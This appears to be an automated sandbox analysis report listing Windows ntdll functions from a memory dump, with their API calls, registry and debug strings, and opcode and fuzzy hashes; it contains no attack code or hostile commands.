                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateFreePrintmemcpy
                                                                                                                            • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                                            • API String ID: 3020890669-2104531740
                                                                                                                            • Opcode ID: 0599418e39fcb40c8d5a2718900c6d6f392f493a4e1cb1876b86fa0a2f4ef073
                                                                                                                            • Instruction ID: f85a98ba4fb79d29120b4a3f2becf44da477cc64865aa06f38ee8b540906a2dd
                                                                                                                            • Opcode Fuzzy Hash: 0599418e39fcb40c8d5a2718900c6d6f392f493a4e1cb1876b86fa0a2f4ef073
                                                                                                                            • Instruction Fuzzy Hash: F541D971500519EBD718CF55C8C0E6AB3F5FF95B12F10806EE9598B680D738DD51CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DE420, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,Software\Policies\Microsoft\Control Panel\Desktop,00000000,00000000,?), ref: 6B1DE45F
                                                                                                                            • ZwOpenKey.1105(?,?,?,?), ref: 6B1DE4A4
                                                                                                                            • ZwClose.1105(?), ref: 6B1DE507
                                                                                                                            • ZwClose.1105(00000000), ref: 6B2353C4
                                                                                                                            Strings
                                                                                                                            • @, xrefs: 6B1DE49C
                                                                                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 6B1DE455
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$InitOpenStringUnicode
                                                                                                                            • String ID: @$Software\Policies\Microsoft\Control Panel\Desktop
                                                                                                                            • API String ID: 3420387270-3130938041
                                                                                                                            • Opcode ID: 1c29af7b8a169b97892f096d5fd87bf69dfec5405d7190349aef8fbefe46cbda
                                                                                                                            • Instruction ID: 524c270f8d5c36753f2f8d8ae9e575fbe501a2ae7e7de3477e8dea716f0345a2
                                                                                                                            • Opcode Fuzzy Hash: 1c29af7b8a169b97892f096d5fd87bf69dfec5405d7190349aef8fbefe46cbda
                                                                                                                            • Instruction Fuzzy Hash: 2A41A072908316ABCB01CF29C080A5BFBE4EF94755F01455EF898C7290E778DA09CBD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B209ED0, Relevance: 10.6, APIs: 7, Instructions: 125COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,FFFFFFFE,000000FF,FFFFFFFE), ref: 6B249836
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,FFFFFFFE,000000FF,FFFFFFFE), ref: 6B24984A
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?), ref: 6B24987A
                                                                                                                            • RtlAcquireSRWLockShared.1105(?), ref: 6B249897
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?), ref: 6B2498B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Lock$ExclusiveRelease$AcquireShared
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1363392280-0
                                                                                                                            • Opcode ID: 688a337dac4e851413f0ec5f61124e081631620ab6096ab0831448190c3edd25
                                                                                                                            • Instruction ID: a4d681128d54929a8c8c34c6d60e0f3a7083caf1b614b7e1e62699ad9b6d5432
                                                                                                                            • Opcode Fuzzy Hash: 688a337dac4e851413f0ec5f61124e081631620ab6096ab0831448190c3edd25
                                                                                                                            • Instruction Fuzzy Hash: 3941BF72A1C24A8FC704CF2CC885B4BB7E5ABC5319F18494DF89497282DA3CE91987D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B266365, Relevance: 10.6, APIs: 7, Instructions: 123memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,00000000,?,00000000), ref: 6B266385
                                                                                                                            • ZwQueryVirtualMemory.1105(000000FF,?,00000002,00000000,?,?,?,00000008,?,00000000,?,00000000), ref: 6B2663A4
                                                                                                                            • memcpy.1105(?,?,?,000000FF,?,00000002,00000000,?,?,?,00000008,?,00000000,?,00000000), ref: 6B2663DF
                                                                                                                            • wcsrchr.1105(?,0000005C,?,?,?,000000FF,?,00000002,00000000,?,?,?,00000008,?,00000000,?), ref: 6B2663E7
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,00000008,?,00000000,?,00000000), ref: 6B26640B
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,-00000002,00000008,?,00000000,?), ref: 6B26644D
                                                                                                                            • memcpy.1105(00000000,-00000002,?,00000000,?), ref: 6B26646B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Allocatememcpy$FreeMemoryQueryVirtualwcsrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 58330029-0
                                                                                                                            • Opcode ID: c1f2ba62f69970b7b14ba36b7924932fcf19eab88d026fda8b36fc3e26e36b79
                                                                                                                            • Instruction ID: 1940dd5446f0310b6f8b0f894c2c207b85e396ec559eed3ac9d6766928b8ce5a
                                                                                                                            • Opcode Fuzzy Hash: c1f2ba62f69970b7b14ba36b7924932fcf19eab88d026fda8b36fc3e26e36b79
                                                                                                                            • Instruction Fuzzy Hash: FB41E436600109EBDB16CF68C8D1BAF77F9EF40B54F154068E9059B280E739DD52C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D649B, Relevance: 10.6, APIs: 7, Instructions: 123COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLcidToLocaleName.1105(?,?,00000002,00000000), ref: 6B1D64F1
                                                                                                                            • RtlGetParentLocaleName.1105(00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6B1D651A
                                                                                                                            • RtlLocaleNameToLcid.1105(?,00000006,00000003,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6B1D656D
                                                                                                                            • RtlLcidToLocaleName.1105(?,?,00000002,00000001,?,?,00000002,00000000), ref: 6B23192B
                                                                                                                            • RtlGetParentLocaleName.1105(00000002,00000002,00000006,00000001,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6B231962
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LocaleName$Lcid$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3691507993-0
                                                                                                                            • Opcode ID: 69958f97e8f230c1dc76df931fb599b77896d028e979387be26f994e5e867cab
                                                                                                                            • Instruction ID: 0ed7e95ab9cc3f4f2c13aa50a8bc1d6af86cdf80a13c93078dcb3de56d2525b2
                                                                                                                            • Opcode Fuzzy Hash: 69958f97e8f230c1dc76df931fb599b77896d028e979387be26f994e5e867cab
                                                                                                                            • Instruction Fuzzy Hash: 54419D7254871AAED311CF24C881A5BB7E9FF89B54F01092AF980D7250E738DE558BE3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B204020, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetSuiteMask.1105(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B2040B3
                                                                                                                            • RtlGetNtProductType.1105(?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B2040D6
                                                                                                                            • RtlInitUnicodeString.1105(?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B2040F1
                                                                                                                            • ZwQueryLicenseValue.1105(?,?,?,00000004,?,?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B204108
                                                                                                                            • RtlGetSuiteMask.1105(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B204155
                                                                                                                            Strings
                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 6B2040E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: MaskSuite$InitLicenseProductQueryStringTypeUnicodeValue
                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                                            • API String ID: 2592082795-996340685
                                                                                                                            • Opcode ID: 89b975a28a75211adc613f86161024df75c4b90d2b3e5b7915b32014abbd2e32
                                                                                                                            • Instruction ID: 4ef31dabfd83b8066f7a4d20ac30507706485876ce344822c5ba88271e62d282
                                                                                                                            • Opcode Fuzzy Hash: 89b975a28a75211adc613f86161024df75c4b90d2b3e5b7915b32014abbd2e32
                                                                                                                            • Instruction Fuzzy Hash: 2541A135A0474A9BC724DFB4C481AEAF7F4EF29705F00886ED5B9D3640D738A544CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EA3E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwQueryInformationToken.1105(000000FA,00000001,?,00000050,?,?), ref: 6B1EA404
                                                                                                                            • RtlLengthSidAsUnicodeString.1105(?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA414
                                                                                                                              • Part of subcall function 6B1EA4B0: RtlValidSid.1105(?,?,?,6B1EA419,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA4BA
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,00000000,?,\REGISTRY\USER\,?,02000000,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA497
                                                                                                                              • Part of subcall function 6B1F3A1C: RtlAllocateHeap.1105(?,00000000,00000000,?,6B2167C0,0000004E,00000000,?,6B2683BE,?,?), ref: 6B1F3A2F
                                                                                                                            • RtlAppendUnicodeToString.1105(?,\REGISTRY\USER\,?,02000000,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA443
                                                                                                                              • Part of subcall function 6B1EA990: memmove.1105(00000000,00000050,00000052,?,?,00000000,?,?,6B1EA448,?,\REGISTRY\USER\,?,02000000,?,?,000000FA), ref: 6B1EA9E2
                                                                                                                            • RtlConvertSidToUnicodeString.1105(?,?,00000000,?,\REGISTRY\USER\,?,02000000,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA469
                                                                                                                              • Part of subcall function 6B1EA500: RtlValidSid.1105(00000050,?), ref: 6B1EA523
                                                                                                                              • Part of subcall function 6B1EA500: wcscpy_s.1105(?,00000100,S-1-,?,00000050,?), ref: 6B1EA54A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$Valid$AllocateAppendConvertFreeHeapInformationLengthQueryTokenmemmovewcscpy_s
                                                                                                                            • String ID: \REGISTRY\USER\
                                                                                                                            • API String ID: 3017593230-2169711131
                                                                                                                            • Opcode ID: 166b8c6338a259081f38b9c804788083f96a3b67f1851a8b90b3038cdecd3c99
                                                                                                                            • Instruction ID: 7d02ac66445b34fa2ff5ad26f24073a6e06cbaf8990915571df16c9f3906181c
                                                                                                                            • Opcode Fuzzy Hash: 166b8c6338a259081f38b9c804788083f96a3b67f1851a8b90b3038cdecd3c99
                                                                                                                            • Instruction Fuzzy Hash: C721A131A1064DABDB10DFF4C805AAEB7F8EF08704F15412AE945EB240EB38D906CB71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FB8E4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,-00000020,?,6B1FB7BF,-00010018,?,00000000,?,-00000018,?), ref: 6B242C77
                                                                                                                            • DbgPrint.1105((ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size),?,-00000020,?,6B1FB7BF,-00010018,?,00000000,?,-00000018,?), ref: 6B242C8F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 3558298466-2558761708
                                                                                                                            • Opcode ID: 9769c6bdcd86cec39b5677aac380159797da2326e5bbc75077885fa57ef804c6
                                                                                                                            • Instruction ID: 776443782e01e630d0712b002423ac6560c5d9eefd9901e847244f5171714475
                                                                                                                            • Opcode Fuzzy Hash: 9769c6bdcd86cec39b5677aac380159797da2326e5bbc75077885fa57ef804c6
                                                                                                                            • Instruction Fuzzy Hash: 8711BE71718506ABD7189B2AC494F27B3F9FB91B25F25816DE00ACB248E73CE846C651
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D9240, Relevance: 10.6, APIs: 7, Instructions: 63memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D925A
                                                                                                                            • ZwClose.1105(00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D9279
                                                                                                                            • RtlFreeHeap.1105(?,?,?,00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D9295
                                                                                                                            • RtlFreeHeap.1105(?,?,00000000,?,?,?,00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D92B1
                                                                                                                            • RtlFreeHeap.1105(?,?,?,?,?,00000000,?,?,?,00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D92CD
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86B4,?,?,?,?,?,00000000,?,?,?,00000000,6B2AF708,0000000C,6B1D9219), ref: 6B1D92D7
                                                                                                                            • RtlFreeHeap.1105(?,?,?,6B2C86B4,?,?,?,?,?,00000000,?,?,?,00000000,6B2AF708,0000000C), ref: 6B1D931A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap$Close$AcquireExclusiveLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3557490396-0
                                                                                                                            • Opcode ID: b2ac3829596d5a13eb290c5b61bf94809677abfca22cfa3f3cd3110ab0e1a743
                                                                                                                            • Instruction ID: a217fbecbae60763050093f27c80685e692eea4bd5123aeb31a79d94114701ae
                                                                                                                            • Opcode Fuzzy Hash: b2ac3829596d5a13eb290c5b61bf94809677abfca22cfa3f3cd3110ab0e1a743
                                                                                                                            • Instruction Fuzzy Hash: 34216A31051A00EFC761DF78CA55F5AB7F9FF08348F1045A9E1099B6A2CB39EA42CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A3E22, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwTraceControl.1105(0000001A,8S,k,00000008,00000000,00000000,?,6B2C5338,00000000,6B2C5320,6B2C5320,6B2C5338,?,6B2C84E0,?,00000001,6B1B5C80), ref: 6B2A3E5D
                                                                                                                            • RtlNtStatusToDosError.1105(00000000,0000001A,8S,k,00000008,00000000,00000000,?,6B2C5338,00000000,6B2C5320,6B2C5320,6B2C5338,?,6B2C84E0,?,00000001), ref: 6B2A3E6B
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8504,00000000,0000001A,8S,k,00000008,00000000,00000000,?,6B2C5338,00000000,6B2C5320,6B2C5320,6B2C5338,?,6B2C84E0), ref: 6B2A3E7A
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8504,6B2C8504,00000000,0000001A,8S,k,00000008,00000000,00000000,?,6B2C5338,00000000,6B2C5320,6B2C5320,6B2C5338,?,6B2C84E0), ref: 6B2A3EA1
                                                                                                                            • RtlSetLastWin32Error.1105(00000006,6B2C5338,00000000,6B2C5320,6B2C5320,6B2C5338,?,6B2C84E0,?,00000001,6B1B5C80,6B1D591B), ref: 6B2A3EAC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorExclusiveLock$AcquireControlLastReleaseStatusTraceWin32
                                                                                                                            • String ID: 8S,k
                                                                                                                            • API String ID: 1422652320-2574273733
                                                                                                                            • Opcode ID: 4432acbf776db7bb468a2331a5d17acb80e0beae40a0a36093045e08c78704bc
                                                                                                                            • Instruction ID: 24612f0905b9dd08470eb8390ba0bc0403988765351a010ba267a6a14b337183
                                                                                                                            • Opcode Fuzzy Hash: 4432acbf776db7bb468a2331a5d17acb80e0beae40a0a36093045e08c78704bc
                                                                                                                            • Instruction Fuzzy Hash: EA11C472A00219A7CB209F69C9C0B9B7BE8FF89B51F404065ED049B281DB38D90287E0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A4015, Relevance: 10.5, APIs: 7, Instructions: 49memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(00000001,?,000000A0,?,?,?,6B246D7C,00000001,00000001,00000000,?,?,6B204E1B,0000000F), ref: 6B2A402F
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001,00000001,00000000,?,?,6B204E1B,0000000F), ref: 6B2A4046
                                                                                                                              • Part of subcall function 6B1F2280: RtlDllShutdownInProgress.1105(00000000), ref: 6B1F22BA
                                                                                                                              • Part of subcall function 6B1F2280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6B1F23A3
                                                                                                                            • RtlRbRemoveNode.1105(6B2C86D4,?,6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001,00000001,00000000,?,?,6B204E1B), ref: 6B2A4051
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C86AC,6B2C86D4,?,6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001,00000001,00000000,?,?), ref: 6B2A4057
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000001,6B2C86AC,6B2C86D4,?,6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001,00000001,00000000,?), ref: 6B2A4062
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000001,6B2C86AC,6B2C86D4,?,6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001), ref: 6B2A407C
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000001,6B2C86AC,6B2C86D4,?,6B2C86AC,00000001,?,000000A0,?,?,?,6B246D7C,00000001), ref: 6B2A408C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireFreeHeapRelease$AlertNodeProgressRemoveShutdownThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 83280457-0
                                                                                                                            • Opcode ID: 644075e6a95081fabca3023ac3c9d93ac66cff5502a06a81fd9fc251e74fd9ed
                                                                                                                            • Instruction ID: 8b774b097d8962e9d664fd361e704f963e8fd1d5dd24ccf838a3217305600525
                                                                                                                            • Opcode Fuzzy Hash: 644075e6a95081fabca3023ac3c9d93ac66cff5502a06a81fd9fc251e74fd9ed
                                                                                                                            • Instruction Fuzzy Hash: 2501DF72201949BFD3109B79CD81E53B7ECEB89768B000226B51887A51CB28EC12C6E0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20DA88, Relevance: 9.3, APIs: 6, Instructions: 253memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C861C,6B2B0268,00000020,6B1EBE44,?,00000000,?,00000001,00000000,?,000002BE,?,?,?,?), ref: 6B20DAD3
                                                                                                                            • RtlImageNtHeader.1105(00000001,6B2C861C,6B2B0268,00000020,6B1EBE44,?,00000000,?,00000001,00000000,?,000002BE,?,?,?,?), ref: 6B20DB65
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000400,6B2C861C,6B2B0268,00000020,6B1EBE44,?,00000000,?,00000001,00000000,?,000002BE,?,?), ref: 6B20DCA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AcquireAllocateExclusiveHeaderHeapImageLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1783064793-0
                                                                                                                            • Opcode ID: f97dc52e1e986dd2fd8bfc8a9708626050ba6e649975308c74b6ac9ca464c594
                                                                                                                            • Instruction ID: 1bbd3e886a97cd1f8acbf484221f6575c1e5ebe17cd187479242a9acc6aec4d9
                                                                                                                            • Opcode Fuzzy Hash: f97dc52e1e986dd2fd8bfc8a9708626050ba6e649975308c74b6ac9ca464c594
                                                                                                                            • Instruction Fuzzy Hash: F7A17C7498620A8FDF45CF29C4C0BA9B7F1BF09389F104599DC249B2D6DB79D882CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E38A4, Relevance: 9.2, APIs: 6, Instructions: 246memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,000000AA,00000007,00000000,00000000,00000000,00000000,?,?,PreferredUILanguages,00000000,00020019,00000018,?), ref: 6B1E3913
                                                                                                                            • RtlInitUnicodeString.1105(?,00000000,?,00000008,000000AA,00000007,00000000,00000000,00000000,00000000,?,?,PreferredUILanguages,00000000,00020019,00000018), ref: 6B1E3960
                                                                                                                            • RtlCultureNameToLCID.1105(?,000000AA,?,00000000,?,00000008,000000AA,00000007,00000000,00000000,00000000,00000000,?,?,PreferredUILanguages,00000000), ref: 6B1E3979
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,00000008,000000AA,00000007,00000000,00000000,00000000,00000000,?,?,PreferredUILanguages,00000000,00020019), ref: 6B1E3A53
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
